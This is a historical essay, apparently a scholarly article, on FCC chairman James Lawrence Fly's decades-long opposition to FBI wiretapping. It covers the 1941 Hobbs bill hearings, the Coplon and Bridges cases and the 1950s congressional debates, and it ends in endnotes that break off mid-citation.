Hoover wrote that Roosevelt as early as 1936 had given the FBI responsibility for gathering intelligence on Fascists and Communists. Fly and Hoover first clashed in September 1940, when Hoover asked the FCC to monitor all long-distance telephone calls passing through New York to or from Germany, France, Italy, and the territories occupied by German and Italian forces. Twice more that fall Hoover asked Fly to intercept and translate cables and coded material. Fly answered that he had given much thought to the requests, but "both legal and administrative difficulties are presented which involve consideration of a number of factors."4

One legal difficulty Fly doubtless had in mind was the ban on wiretapping in Section 605 of the Communications Act of 1934. In a Washington Post op-ed article, he quoted the meat of the section, which was at that time a blunt, unqualified prohibition: "No person not being entitled thereto shall receive ... any interstate...communication by wire or radio and use the same for his own benefit or for the benefit of another not entitled thereto."5 Another often-violated provision, as Fly condensed it in a letter to President Roosevelt, was that "No person...shall intercept any communication and divulge [it] to any person."6

An early effort to weaken Section 605 came in 1941 when Congressman Sam Hobbs of Alabama introduced a bill to loosen restrictions on wiretapping. Hobbs was acting at the urging of Alexander Holtzoff, special assistant to the attorney general and "close associate" of J. Edgar Hoover. Holtzoff reportedly called himself "Hobbs's brain trust."7 Hobbs's bill was simple: The head of any executive department of the United States could authorize a wiretap upon suspicion that a federal felony had been committed or was about to be committed. An opponent of the bill, Congressman Thomas Eliot of Massachusetts, wrote President Roosevelt for his views. Roosevelt answered that the Hobbs bill went "entirely too far," but because the country was facing a possible war, he favored legalizing wiretapping to halt espionage and also would accept it to catch kidnappers. Roosevelt called the use of wiretapping in law enforcement "the most delicate problem in the field of democratic statesmanship." The New York Times reprinted his letter in full, and the Hobbs bill became associated with the Roosevelt administration.8

Like Hobbs, Attorney General Robert Jackson favored legalizing wiretapping on suspicion of all federal felonies, although he would accept its being limited to espionage, sabotage, kidnapping, extortion, and narcotics violations. After hearings on the Hobbs bill began, Congressman Francis E. Walter of Pennsylvania introduced a bill to let U.S. commissioners or federal, district, or state judges authorize wiretaps for information useful in detecting or prosecuting felonies involving national defense. Both bills would make any evidence gained through wiretapping admissible in federal courts. The National Federation for Constitutional Liberties (described at the hearings as a nonprofit combination of church, civic, and labor groups) proposed that the FCC testify on the Hobbs bill to the House Judiciary Committee because the FCC was more closely related to communications than was any other agency. The committee also asked Fly to appear because he was chairman of the Defense Communications Board, and espionage, a prime defense concern, was the chief crime for which wiretapping was sought.9 Jackson testified first in executive session.
Following his testimony, reporter Marquis Childs wrote that the wiretapping bill had “almost the unanimous support of the Republicans and of Conservative Southern Democrats” and was likely to pass.10 After Fly’s testimony, however, opinions began to shift; the committee asked Fly to return for a second session, and members “were greatly impressed by Fly’s detailed reasoning against the measure.”11 Joseph Rauh of the FCC legal department accompanied Fly and recalled his testimony with obvious relish. Fly began tentatively, he said, but then, “He blew that goddamn bill up to the ceiling. There wasn’t anything left of the wiretapping bill when he got done with it...We had a ball before the committee.”12 Roosevelt was on a vacation cruise in the presidential yacht accompanied by the attorney general when he was informed of Fly’s testimony. Rauh remembered meeting the next day with Fly, who had received a memo from Roosevelt asking for an immediate full report of Fly’s testimony on the president’s bill. “Perspiration was already on [Fly’s] forehead,” Rauh said; “soon I had exceeded it.”13 Rauh and Fly spent the next 24 hours preparing a response. Fly wrote that he had stayed away from policy questions and had focused on practical matters. He described the technical difficulties of wiretapping radio or telegraph circuits carrying “thousands of messages of hundreds of persons”; anyone engaging in such wiretapping would be immersed in an avalanche. Fly pointed out that both radio and telegraph companies kept records of their point-to-point messages, and getting those messages by subpoena - with possible liberalization of the subpoena power - would be more feasible than wiretapping. The Hobbs bill, Fly noted, did not limit wiretapping to the wires of a particular crime suspect. This “dragnet method” would require so many individual taps that agents would be drained away from duties more likely to get results. Finally the bill decreased the penalty for unauthorized use of wiretaps; making wiretaps easier with lesser penalties would harm defense by making military and industry personnel reluctant to use telephones.14 Roosevelt responded that the issues Fly raised were matters for the Department of Justice rather than the FCC and that the legislation should not be hampered by “technicalities.”15 The St. Louis Post-Dispatch urged that Fly’s views be made public and that Congress pay close attention to his warning about “the dangers of breaking down such a fundamental bulwark of American democracy as the individual’s right to privacy in his home” and “the perils of attacking freedom even at the edges.”16 Holtzoff was a rare voice defending Hobbs’s bill among more than 30 hearing witnesses who almost universally opposed it.17 The federal courts already had established several precedents relevant to the bill. First was the case of Olmstead v. United States, in which by a 5-4 decision the court held that wiretapping was not a violation of the Fourth and Fifth Amendments to the Constitution prohibiting unlawful search and seizure and self-incrimination. But the four dissenters were some of the Supreme Court’s most respected justices: Oliver Wendell Holmes Jr., Louis D. Brandeis, Pierce Butler and Harlan Fiske Stone. At the House hearings, Louis F. McCabe of the National Lawyers Guild cited other precedents: Weiss v. United States, in which the Supreme Court prohibited taps of intrastate calls and United States v. 
Polakoff, which declared evidence unusable when one party tapped a telephone conversation and the other party was unaware of the tap. Further, in Nardone v. United States, a bootlegging case, the court disallowed evidence gained by wiretapping in a federal court, and in a second Nardone case prohibited use even of evidence uncovered through leads gained from taps.18

Labor unions were especially worried. Their witnesses spoke of fears that management and labor might tap phones to get information on each other and that taps might lead employers to discriminate against employees for union activities. Eugene Connolly of the American Labor Party said the Federal Corrupt Practices Act had listed many political party activities as felonies; thus, under the present bill, union election activities could become felonies, and suspicion of a felony could justify wiretapping. Connolly protested that Americans had a right to know of police activity taken against them; unless they were arrested, citizens might never learn they had been tapped and could not seek redress as they could from an improper search when property was confiscated. An attorney for the Congress of Industrial Organizations (CIO) said the bill's provision for examining "other similar messages or communications" could be interpreted to justify tampering with the mails.19

Vagueness about legal procedures bedeviled the proposed bills - as it would bedevil wiretapping legislation for decades. Several critics pointed out the Hobbs bill's failure to specify how much information a federal official needed before authorizing a tap. Some congressmen worried that a cabinet official could get permission to wiretap upon slight supposition. Hobbs did not want to require specific evidence before authorizing a wiretap because this would slow the process; speed in installing a tap was essential, he said. The committee also considered whether the current threat of war justified wiretapping. In May, the New York Times reported that the administration was increasing pressure on Congress to pass the Hobbs bill because the Department of Justice was handicapped in getting evidence about saboteurs and spies.20

Fly's testimony, though it was in executive session and not printed, received considerable media attention. In addition to the St. Louis Post-Dispatch articles, the New York Times ran an article on him in May and cited him again that summer. A sizable story also appeared in the Baltimore Sun. Fly's testimony may have received special weight because Judiciary Committee Chairman Hatton Sumners was, like Fly, a Texan, and the two had worked together during Fly's days in the thirties as Tennessee Valley Authority General Counsel.21

Only one of the two House bills on wiretapping came to a vote; the Walter bill died along the way. Hobbs rewrote his bill, adding restrictions to tapping that presumably would make it more palatable, but even so in late June the House voted against it 154 to 146. Fly and Hoover entered into more than a decade of disputes that resulted in Fly's having an extensive FBI file containing accusations that he had handicapped the Bureau's defense effort. The file contains repeated mentions of Fly's opposition to the Hobbs bill, his refusal to intercept commercial messages for the FBI, and his efforts to keep radio operators' fingerprints out of the FBI's permanent file. In 1950 FBI Assistant Director Mickey Ladd wrote the director: "It appears that Mr.
Fly did everything in his power to delay making arrangements for the Bureau to monitor international communications prior to Pearl Harbor."22 As late as 1955 a memorandum placed in Fly's file referred to his 1941 opposition to the Hobbs bill. Hoover aired their disputes in a book he authorized, The FBI Story, and Fly accused Hoover of furnishing inaccurate information about his stand on wiretapping to radio commentator Walter Winchell.23 During the following decade the FBI and successive attorneys general tried to loosen restrictions on wiretapping.

While the nation faced the threat of war, Roosevelt pragmatically sought ways to uncover espionage. In fact, in May 1940, long before Fly's testimony and the bill's defeat, the President had sent a memorandum to Jackson in which he recognized the possibility of civil rights abuse through wiretapping but said that the Supreme Court surely did not intend to forbid taps in cases involving national defense. Roosevelt said he reluctantly would permit wiretaps provided the attorney general authorized every tap. Jackson, however, ignored this proviso and handed over the authorization task to Hoover. Like many attorneys general under whom Hoover served, Jackson supervised Hoover's activities only superficially; according to a later attorney general, Edward Levi, much oversight of the FBI had been "sporadic, practically nonexistent, or ineffective."24 Such behavior increased Hoover's freedom to wiretap.

Wiretapping again became an issue for Fly in 1943 when Congressman Eugene Cox of Georgia became chairman of a House committee investigating the FCC. Admiral Stanford Hooper gave the committee 13 accusations against Fly, among them that "The Chairman of the Defense Communications Board (Fly) opposed legislation permitting wire-tapping which would have permitted checking of the telephone to Japan before Pearl Harbor, and might have prevented the disaster."25 Fly had to wait nine months to refute this charge before the committee. The committee counsel quoted Congressman Emanuel Celler to the effect that Fly probably was the only high government official who still opposed wiretapping. With perhaps more courage than wisdom, Fly answered the Pearl Harbor charge by quoting Senator Alben Barkley: "I have not heard of anybody stupid enough to think that the debacle at Pearl Harbor was caused by the failure of Congress to pass wire-tapping legislation." Fly added: "Senator Barkley's circle of acquaintances, apparently, did not extend far enough."26

In actuality, as FBI Assistant to the Director Alan Belmont later acknowledged, the attorney general had granted authority to install "a technical surveillance on the telephonic communications between Hawaii and Japan" on 22 October 1941, and operation began on 3 November.27 Four days before the attack the FBI reported to naval intelligence a telephone message from the Japanese consulate saying that the consul general was burning "all of his important papers," an indication of interrupted diplomatic relations.28 On 5 December a surveillance report described a phone call between Honolulu and Japan involving weather conditions, movement of aircraft, and "types of ships in Hawaii." The FBI relayed this information to military authorities on the evening of 6 December 1941.29 Fly can hardly be blamed for either a lack of wiretapping or the inability to predict the Pearl Harbor attack.
After the war President Truman accepted Attorney General Tom Clark's recommendation that Roosevelt's letter authorizing wiretaps remain in effect. Fly continued his fight against wiretapping after he left the FCC in 1944 and opened a law firm. His friend Joseph Swidler, who replaced Fly as TVA general counsel, said that Fly "missed the limelight he had enjoyed as Chairman of the FCC. This is a post-occupational hazard common to all former commission chairmen."30 Perhaps that was the reason Fly accepted a position in 1946 as a director of the American Civil Liberties Union. In that capacity he became involved in the case of Judith Coplon.31

On 4 March 1949, FBI agents arrested Coplon, a Justice Department employee who had espoused Communist causes while a student at Barnard. In her purse were short versions of documents from the Justice Department, including some from the FBI. The bureau maintained that she was about to give them to Valentin Gubitchev, a Russian engineer at the United Nations. At the Washington trial the charge was copying, taking, concealing, and removing documents of the Department of Justice. In New York, she was tried jointly with Gubitchev for conspiring to defraud the United States and to deliver defense information to a citizen of a foreign nation. One document in her purse named an agent in a Soviet trading company who supposedly was working for the FBI. She declared her innocence and at first said that she and Gubitchev were in love - a story difficult for the jury to believe when the prosecution presented evidence that she had spent nights in hotels with a Justice Department attorney during the period of her meetings with Gubitchev.32

The month of Coplon's arrest - when wiretapping was not yet an issue in the case - Fly testified before a special committee of the New York County Criminal Courts Bar Association. Fly called New York Governor Thomas E. Dewey the "founding father" of legalized wiretapping in the state and said the ACLU had asked the governor to tell New Yorkers how much wiretapping was occurring in their state.33 That same month Fly (and others, including Joseph Rauh) signed a letter to Senator Pat McCarran, Chairman of the Senate Judiciary Committee, saying that both Americans for Democratic Action and the ACLU opposed wiretapping in any form. They were responding to pending bills - one of them McCarran's to loosen restrictions on wiretapping. FBI Assistant Director D. Milton Ladd cited this letter in a lengthy memo to Hoover about Fly's criticism of the Bureau.34 Two months later - while the Coplon trial was in full swing - Fly, as attorney for the New York County Criminal Courts Bar Association, petitioned the U.S. attorney general to ensure the enforcement in New York of Section 605's ban on wiretapping. According to a survey cited in the petition, local New York police had engaged in more than 300 instances of authorized wiretapping during 1948, along with uncounted unauthorized taps.35

As the Coplon case continued, wiretapping became only one of the prosecution's problems and the FBI's embarrassments. First, the 30 agents pursuing Coplon on the night of her arrest had not waited for her to pass the summaries of documents to Gubitchev; therefore she had not actually committed espionage. Second, no one had secured a warrant to arrest her. Third (and most important to Fly), leads against her were based on taps of her home.
The FBI continued the taps after her arrest and even recorded conversations between Coplon and her attorney, Archibald Palmer.36 Midway in her trial, Coplon's attorney demanded that the FBI documents Coplon had copied for Gubitchev be opened in court, thus starting a chain of revelations about FBI wiretaps. Robert J. Lamphere, the FBI agent who supervised her arrest, feared that "to release the basic file reports might not only endanger security and compromise informants but also bring to light many unsubstantiated allegations which would do no one any good." He believed that Palmer expected the government to drop the case rather than reveal the contents of the files.37 But the judge ordered them opened, and Palmer read many of them aloud.

The files contained reports by informants that major celebrities were Communist Party members, including actors Fredric March and Edward G. Robinson, singer Paul Robeson, and writer Dorothy Parker. Other screen stars supposedly had helped the Communist cause. One informant noted that actress Helen Hayes had portrayed a Soviet teacher in a skit at a rally for Russian relief. According to the Washington Times Herald, some of the information definitely came from wiretaps. During the trial Fly wrote his grandchildren of the pain caused by FBI allegations: "Yesterday the eminent playwright, Charles MacArthur, was in my office. His wife, the charming and talented Helen Hayes, was at home crying. . . . Some FBI reports containing malicious gossip as to her loyalty had been aired in the Washington trial of Judith Coplon. A number of other prominent and loyal people were smeared in like manner."38

Coplon's attorney early on tried to learn the source of the FBI's original suspicion of his client. He suspected wiretapping, but FBI agents on the witness stand at first denied this. The bureau then destroyed recordings of the taps before the court could hear them. Fly, for the ACLU, wrote an amicus curiae brief seeking a new trial and citing as a reason "the conduct of government attorneys and FBI representatives who, by a process of concealment and infantile denial, misled the trial court on this vital issue and in the teeth of their knowledge of the true facts."39 Fly sent a letter to the New York Times accusing the FBI of violating the Criminal Code by destroying recordings of the taps, which were evidence. The violation seemed clear since the bureau's order for the destruction gave as a reason "the immediacy of her trial." The order also authorized getting rid of "all administrative records in the New York office" and was signed "OK-H." Fly noted that the printed form included the words: "To be destroyed after action is taken, and not sent to the files," which implied, Fly said, "a routinized scheme and practice of destroying public records."40

Meanwhile, a petition asking for a public investigation of the FBI was sent to the president of the U.S. Senate, the Speaker of the House, and chairs of both the House and Senate judiciary committees. Both FBI Assistant Director Louis Nichols and columnist Walter Trohan named Fly as the reputed author, though copies of the petition in both Fly's papers and his FBI file are unsigned. Fly was definitely the author of a letter to the U.S. solicitor general in which he repeated the charge that FBI agents had by implication and evasion misled the court in Coplon's Washington trial. Nichols, after talking with Hoover, urged the solicitor general to write a strong letter to Fly rebutting the charge.
Nichols repeatedly complained to the FBI's second-in-command, Clyde Tolson, that the solicitor general's rebuttal was not strong enough, that it should "tie into Fly and nail his lies once and for all."41

Coplon was found guilty at both her Washington and New York trials, and both the Washington and New York federal courts of appeal agreed to hear the case. New York Judge Learned Hand's court set aside the lower court's verdict, though not simply because evidence came from taps. He stated that although "the guilt is plain," the lower court judge (at the FBI's urging that the wiretaps might involve national security) had refused to let Coplon see the records of some wiretaps after he read them and decided they were irrelevant. Thus, she had been denied information that might have helped her defense. Further, she had been arrested without a warrant, which made the evidence in her purse inadmissible. Judge Hand left the indictment standing, however, upon the possibility that a way might be found to hold a new trial excluding all evidence and leads resulting from wiretaps.42 In Washington, Judge Wilbur K. Miller, after agreeing that the evidence sustained the jury's verdict, remanded the case because the wiretaps of telephone conversations between Coplon and her attorney deprived her of the right to counsel under the Bill of Rights. The indictment was not dropped for 16 years.43

During the Coplon case, Fly wrote in the Washington Post that wiretapping both nullified the law and made blackmail easier by fertilizing "the breeding ground of crime itself. . . Even the record of official New York taps shows 95 percent involve gambling, bookmaking, prostitution, the richest field for blackmail and extortion."44 The next day, Attorney General J. Howard McGrath issued a statement saying that the FBI would continue its wiretaps and that he was planning an "anti-tygoon" conference about techniques for catching subversives and criminals. The Post editorialized that if this was supposed to be a response to Fly's article, it was a poor one. The Post admitted that methods like wiretapping might make the FBI more efficient in catching saboteurs; so would rifling the mails, unrestrained searches, suspension of habeas corpus, the thumbscrew and the rack, "but every free and civilized society has forbidden its police to use such methods."45

Fly became involved in another case of FBI wiretapping when labor leader Harry Bridges asked Fly to represent him in 1949. Fly had met Bridges on a presidential fact-finding commission some years earlier and recalled Bridges as ". . . a man of extraordinary competence whom all will admit has done a remarkable job in improving the economic and working conditions of the West Coast Longshoremen. . . . So forceful have been [m]any of his enemies that the full power of the United States government has been turned loose against this man for fifteen years."46 When Bridges discovered that the FBI was wiretapping his hotel room in 1940, he typed notes, tore them up, and planted them in his wastebasket. He then moved to a nearby hotel and used binoculars to watch the FBI piecing the notes together. The union leader had already undergone six investigations when Fly took his case. Congressman Hobbs, author of the 1941 wiretapping bill that Fly testified against, in 1940 had secured passage of a law that would deport Bridges. The case eventually went to the Supreme Court where the deportation order was canceled. After that decision in 1945 Bridges became a U.S.
citizen, but four years later the government filed a civil action to cancel his citizenship and deport him. Bridges was accused of lying at his naturalization hearing in saying he had never been a Communist. At this point Bridges asked Fly to be his attorney.47 William Fitts, one of Fly's law partners, remembered talking with him about whether the law firm should be associated with the case. Fly said, "I think that this is a civil liberties issue . . . [I]llegal means have probably been used here, and I feel very strongly on this question of individual rights and wire-tapping and I know that this might hurt the business." Fitts told Fly: "If you feel it's the right thing to do, go ahead and do it."48

Fly, as Bridges's attorney, promised to call FBI agents as witnesses to determine whether evidence had been obtained illegally through taps. He also defended Bridges on the basis that the statute of limitations (three years) had expired. Four years later, in June 1953, the Supreme Court ruled 4-3 against the government, citing expiration of the statute of limitations. Though Fly represented Bridges in only one court appearance, he suffered for it for almost a decade. Bridges was a factor in Fly's being named a "concealed Communist" by a loyalty board and also in Fly's effort to get a television station license.49

Meanwhile Fly had continued his campaign against wiretapping in print. He demonstrated to readers of Look magazine how easily and cheaply a tap could be installed. In the New Republic Fly argued that wiretappers "violate every sacred relation established by God and protected by law: husband and wife; parent and child; minister and parishioner; doctor and patient; lawyer and client."50 He also kept his sense of humor, writing a tongue-in-cheek complaint to the FCC that telephone companies were overcharging many of their customers: subscribers whose lines were being tapped should at least be entitled to party line rates! To prevent destruction of government records, wiretappers should send records of their taps to the FCC; these would be pressed into bricks, generating enough to erect a new FCC building. In a more serious vein, Fly criticized attorneys for their apathy toward tapping in the Harvard Law School Record: "The challenge is to the bar. Has it the courage? If not, the bar may awaken too late to face the fact . . . that our liberties have been permanently scarred . . . What is the bar going to do, or would you rather play golf?"51

Fly also discussed wiretapping in two articles for the Saturday Review during the 1950s. In his review of Max Lowenthal's The Federal Bureau of Investigation, he described "Suppression by Smear," noting how Hoover discouraged citizens from speaking out by threatening them with unfavorable stories from journalist Walter Winchell and others.52 Six years later, in a review of Don Whitehead's The FBI Story, he castigated Hoover for wiretapping "in the beguiling name of 'security.'"53

The years 1953 and 1954 brought arguments over wiretapping to a climax, as the previous decade had shown that wiretapping needed more detailed regulation than was anticipated in 1941. The judiciary committees in both House and Senate appointed subcommittees to hold hearings, each subcommittee considering four bills. The Senate hearings showed that law enforcement officials felt such a need for wiretap evidence usable in court that they were finding ways to bypass federal court decisions, civil libertarians, and even existing federal law.
In the previous 16 years, Congress had considered more than 30 bills involving wiretapping, but only four had passed even one house. But more than 30 states allowed evidence gained by wiretapping. While Hoover had told the attorney general that no more than 200 FBI wiretaps were ever in place at any one time, according to the Lawyers Guild, 58,000 taps were authorized under the New York statute in 1952 alone. New York District Attorney Miles McDonald testified that policemen were buying their own equipment for tapping and using illegal taps to shake down bookmakers. Wiretapping was certainly widespread.54

Congress was exerting pressure to expand the list of crimes for which wiretapping could be used. House Subcommittee Chairman Kenneth B. Keating of New York sponsored a bill to allow federal agencies involved with national security to wiretap when they were checking on treason, sabotage, espionage, "or similar offenses"; the information could be used in court, but the agencies would be required to get approval from a federal judge before tapping and from the attorney general before disclosure. Some proposed bills would permit tapping for crime detection, making it possible to tap wires of people who had not yet committed an offense - a topic much discussed.55 The House hearings included a letter from Attorney General McGrath about the eagerness of lawyers - after the Coplon verdicts - to learn whether their clients had been tapped so they might free them as Coplon was freed. To prevent this, McGrath found it necessary in cases involving wiretaps to hold pretrial hearings to determine that no material evidence came from taps.56

As in 1941, the process of getting approval to institute a tap prompted much debate in the House hearings. Who should be able to authorize taps? Requiring a court order would delay installing the tap and make it easier to leak information about it. In New York, where state law required such authorization, a stenographer with a boyfriend on the police force had leaked information about a wiretap so that it reached the bookmaker who was being tapped. Deputy Attorney General William P. Rogers favored simply letting the attorney general approve wiretaps: "the proper party to trust is the Attorney General of the United States." Another witness was Joseph L. Rauh, who had attended the earlier wiretapping hearing with Fly in 1941. He submitted a statement from Americans for Democratic Action proposing that only a Supreme Court justice or the chief judge of a circuit court of appeals should authorize taps, and only after approval by the attorney general.57

Which crimes would justify taps? Most bills limited wiretaps to matters concerning national security, but Congressman Emanuel Celler offered a bill permitting taps for crimes involving "the safety of human life" (which presumably would include kidnapping). Keating and Celler both specified that wiretapping could be used if national security were threatened by treason "or in any other manner." A witness from the American Federation of Labor feared this provision was so broad that it could be invoked to settle labor disputes.58 Argument arose about whether a wiretap violated the Fifth Amendment by forcing persons to testify against themselves. Would a person's own words on the tap be a form of confession? Witnesses debated whether the Fourth Amendment was violated when the tap produced evidence of a crime that had not been cited in the authorization for the tap.
New York District Attorney Miles McDonald testified that in his state, “as long as the tap is lawful when we make it and we find evidence of other crimes . . . we are entitled to use the evidence.” This raised again the issue of whether leads - not just evidence itself - from wiretaps could be used in federal court.59 After the House hearings, Majority Leader Charles Halleck proposed that the sole authority for granting permission to tap should be the head of the FBI, but this proposal died quickly. In April, 1954, a wiretapping bill requiring a federal judge’s advance approval passed the House by a vote of 378 to 10.60 Fly, meanwhile took his case against wiretapping to television. Between the House and Senate hearings Halleck and Fly reached a national television audience when Edward R. Murrow asked them to discuss wiretapping on See It Now. The two men debated by telephone with a camera on each, and approximately an hour of argument was edited to about 15 minutes. On the videotape Fly smiles often and gives every appearance of enjoying the conflict. He dominates the conversation and reduces Halleck to saying that the FBI had held information about citizens “inviolate - no citizen had been harmed.”61 In a summary of the program, placed in Fly’s FBI file, the Bureau’s M.A. Jones wrote, “Fly was extremely vindictive in his attitude towards the Bureau, and Halleck had trouble interrupting to rebut his statements.”62 After the program, Chairman Keating and Fly spoke, and Fly sent Keating his views. By this time Fly had relaxed his stance against wiretapping somewhat. He still thought “American democracy loses more than it gains” by authorizing wiretapping, but with appropriate safeguards he would accept the ACLU position, which approved wiretapping only in cases of “treason, sabotage, espionage, and kidnapping or threats of kidnapping.”63 The ACLU had prepared an elaborate official position that included safeguards to civil liberties: All requests for taps would come from the attorney general and could be approved by only one federal judge in each district, selected by the Supreme Court (to prevent shopping around for a compliant judge). All copies of taps would be made available to the defendant, and no tap could be authorized for more than 90 days without a petition for extension.64 In his letter to Keating, Fly added a proposal that went beyond the ACLU position. Fly urged that any bill, if passed by Congress, should expire after two years and would need to be reenacted after a study of its effects.65 Fly represented the ACLU before the Senate subcommittee in hearings on four bills to loosen restrictions on wiretapping. His forthright testimony illustrates his ability to ignore personal consequences. Two events had occurred that made his stand on wiretapping both a personal and financial risk. First, in 1951, the Tennessee Valley Authority Loyalty Board issued charges against its general counsel, Joseph Swidler, an attorney who had worked with Fly at TVA during the 1930’s. 
Two charges against Swidler concerned his association with Fly, who was "reputed to be a concealed Communist." Fly protested directly to President Truman "in the capacity of a responsible citizen whose most prized possession - his good name, and the public respect of his character and loyalty - is at stake." He attributed the accusation to the fact that he had "slugged it out with John Edgar Hoover on some of his high-handed methods and especially on his widespread illegal conduct of wire-tapping."66 Swidler was later fully cleared and became chairman of the Federal Power Commission.67

In testifying, Fly also risked losing a business enterprise. Fly headed a company that had applied to the FCC for a television station license to operate Channel Seven in Miami. The American Legion, in its national publication Firing Line, raised questions about his qualifications because - among other things - he had opposed wiretapping and defended Harry Bridges and Judith Coplon. A Legion post in Miami sent the Firing Line to all FCC commissioners, the Florida congressional delegation, Communist hunter Senator Joseph McCarthy, and chairmen of the Senate Internal Security Subcommittee and the House Un-American Activities Committee. Fly said there had been calls for an investigation, and he felt "paralyzed helplessness."68

Fly showed no "paralyzed helplessness" in his no-holds-barred Senate testimony, however. After describing the ACLU position, he said that although the ACLU - and he himself - generally opposed wiretapping, if it was to be adopted, the most important safeguard was the requirement for a court order. Letting the attorney general or other prosecutor alone approve a wiretap granted too much power, and "power is a very heady medicine." To the objection that it was too difficult to reach federal judges to get their approval, Fly replied that it customarily would take no more time to reach a judge than to install a tap. Fly also objected to a change in the law to make it possible to try Judith Coplon again; he called it an "ex post facto effect" and "very serious business."69

Fly challenged the attorney general's contention that Section 605 permitted wiretaps so long as information from them was not "divulged" outside the FBI; Fly held that Section 605's ban against divulging "to any person" should be taken literally. As he had written in 1949, the attorney general's interpretation of "divulging" and "using" was "wishful thinking," a "dangerous pastime for attorneys general."70 In 1968 the law was amended to permit law enforcers to divulge legally acquired information from taps among themselves.71 Responding to a statement that an innocent person need not worry about being tapped, Fly answered: "By that pseudo line of logic you could dispose of the whole Bill of Rights. I don't expect to be on trial in a criminal court tomorrow, what do I care about trial by jury, due process of law, and that sort of thing? If I take that attitude, the whole Bill of Rights can be swept out of the window."72

The Senate Judiciary Committee in August voted 7-7 on sending the bill forward, which killed it for the time being, but in November Attorney General Herbert Brownell vowed to continue fighting for more freedom to tap.73 Since Fly's day, wiretapping has become more accepted, and laws regulating it have become more complex. Some provisions that Fly championed became policy. Taps require a court order from specified judges except for surveillance of foreign agents and some emergencies.
The length of time a tap can continue without renewal of the court order is even shorter than the ACLU advocated: 3 days rather than 90. Rules limit the destruction of wiretap records. The number of crimes for which wiretaps can be used and the types of judges who can authorize taps have been expanded, however.74 It is hard to measure Fly’s influence. Certainly he kept the issue before the American people, and both times when he testified against expanding wiretapping, Congress took the course he favored. He paid a personal price for his success, however. Fly’s daughter said he never received a cancellation of charges made by the TVA Loyalty Board. The struggle for the license to operate the Miami television station lasted into the 1960’s, long after Fly had withdrawn as an applicant for multiple reasons - some not related to his political views. His campaign against wiretaps offers the too rare spectacle of an individual willing to endure personal risks to fight for his beliefs.75 Fly apparently enjoyed a good fight. In the middle of the Cox hearings in 1943, he told a reporter, “If I weren’t lashed at every week or so, life would be dull.”76 And in notes for an autobiography addressed to his grandchildren, he wrote: “Don’t think I’ve been a professional worrier except in the sense that I’ve enjoyed worrying some powerful guys who are doing things that may affect you.” As he told his grandchildren, one aspect of his life he deplored was his “failure in teaching John Edgar Hoover the Bill of Rights.”77 James Lawrence Fly, The FBI, and Wiretapping by Mickie Edwardson (Mickie Edwardson is a professor emerita of journalism and communications from the University of Florida.) 1 Gregory E. Birkenstock, “The Foreign Intelligence Surveillance Act and Standards of Probable Cause: An Alternative Analysis,” Georgetown Law Journal 80 (1992): 843. 2 Dan Carney, “Broad Anti-Terrorism Measures Stall in Task Force,” Congressional Quarterly Weekly Report, 3 August 1996, 2202-2; Juliana Gurewald, “Bill on Encryption Exports Gets Panel Approval,” Congressional Quarterly Weekly Report, 28 June 1997, 1520; Mike Mills, “Privacy Groups Assail FBI’s Wiretapping Plan,” Washington Post, 3 November 1995, sec. D, p.1. 3 United States Code Service (Lawyers Edition), title 18, secs. 2510-21, title 47, sec. 605, title 50, sec. 1801-11 (Rochester, 1993-1996). 4 J. Edgar Hoover, confidential memorandum, 24 August 1936, in From Secret Files of J. Edgar Hoover, ed. Athan Theoharis (Chicago 1991) 18081; Hoover to Fly, 7 September 1940, 11 October 1940, 22 November 1940; Fly to Hoover 7 December 1940, all in Fly Papers, Rare Book and Manuscript Library, Columbia University, New York City. 5 James Lawrence Fly, “Threat to Liberty, Defiance of Law Seen in FBI Wire-Tapping,” Washington Post, 7 January 1950, sec. A, p. 9. 6 Fly to Roosevelt, 27 March 1941, personal Collection of James Lawrence Fly Jr. (hereafter Fly Collection), 2 (emphasis in Fly’s original). 7 Nathan Robertson, “Undercover Pressure Exerted to Legalize Wire Tapping,” PM, 27 March 1941, 10. 8 U.S. House Subcommittee no. 1 of the Committee on the Judiciary, To Authorize Wire Tapping. Hearings on H.R. 2266, H.R. 3099, 77th Cong., 1st sess., 1941, 1, 257; “President Advocates Limited Wire Tapping in Defense Sabotage and Kidnapping Cases,” New York Times, 26 February 1941, p.1. 9 U.S. House, To Authorize Wire Tapping, 17, 1-2-202; “Undercover Pressure,” PM, 27 March 1941, 10; Fly to Roosevelt 27 March 1941, 2. 10 Marquis W. 
Childs, “House Committee Approval Likely on Wire-Tapping,” St. Louis Post-Dispatch, 18 March 1941, sec. A, p.3. 11 Marquis W. Childs, “Head of U.S. Communications Board Vigorously Opposes Wire Tapping,” St. Louis Post-Dispatch, 26 March 1941, sec. A, p.10. 12 Joseph Rauh, interview by author, tape recording, Washington, DC., 28 December 1989. 13 ”Roosevelt Puts to Sea on Short Vacation Cruise,” St. Louis Post-Dispatch, 22 March 1941, sec. A, p.2; Rauh interview. 14 Fly to Roosevelt, 27 March 1941. 15 Roosevelt to Fly, memorandum, 1 April 1941, Fly Papers. 16 ”A Warning on Wire-Tapping,” St. Louis Post-Dispatch, 27 March 1941, sec. C, p.2. 17 U.S. House, To Authorize Wire Tapping, 5-14. 18 Olmstead v. United States, 277 US 438 (1927); Weiss V. United States, 308 US 321 (1939); United States v. Polakoff, 112 F. (2d) 888 (C.C.A. 2d, 1940); Nardone v. United States, 302 US 379 (1937); Nardone v. United States, 308 US 338 (1939); U.S. House, To Authorize Wire Tapping, 42, 79, 166. 19 U.S. House, To Authorize Wire Tapping, 102, 117, 125, 85. 20 Ibid., 24-28, 50; “Asks Uniformity on Sabotage Guilt,: New York Times, 9 May 1941, 15. 21 ”Fly of FCC Opposes Wiretapping Power,” New York Times, 20 May 1941, p. 17; James B. Reston, “Congress Finishes Fund Bills to Set 33 Billion Record,: New York Times, 1 July 1941, p. 1; Paul W. Ward, “Tangle Develops over Wire Tapping,” Baltimore Sun, 22 March 1941, clipping, Fly Papers; Fly to John Lord O’Brian, 14 July 1953, Fly papers. 22 Legislative Reference Service, Library of Congress, Digest of Public General Bills with Index, No. 4, 77th Cong., 1st sess (3 January to 30 June 1941), 172, 259; Reston, “Congress Finishes Fund Bills,” 1; see also Federal Bureau of Investigation, File on James Lawrence Fly, No. 62-73756 (hereafter Fly File), including V.P. Keay to H.B. Fletcher, memorandum, 16 November 1949; and Mr. Ladd to the Director, memorandum, 11 January 1950. 23 Fly File (deleted) to A.M. Belmont, memorandum, 10 January 1951; D.M. Ladd to the Director, memorandum, 28 August 1951; A.J. Belmont to L.V. Boardman, memorandum, 18 November 1955; Don Whitehead, The FBI Story: A Report to the People (New York, 1956), 187-88; James Lawrence Fly, “A Wholesome Thing,” Saturday Review of Literature, 23 December 1950, 15, 37. 24 Roosevelt to 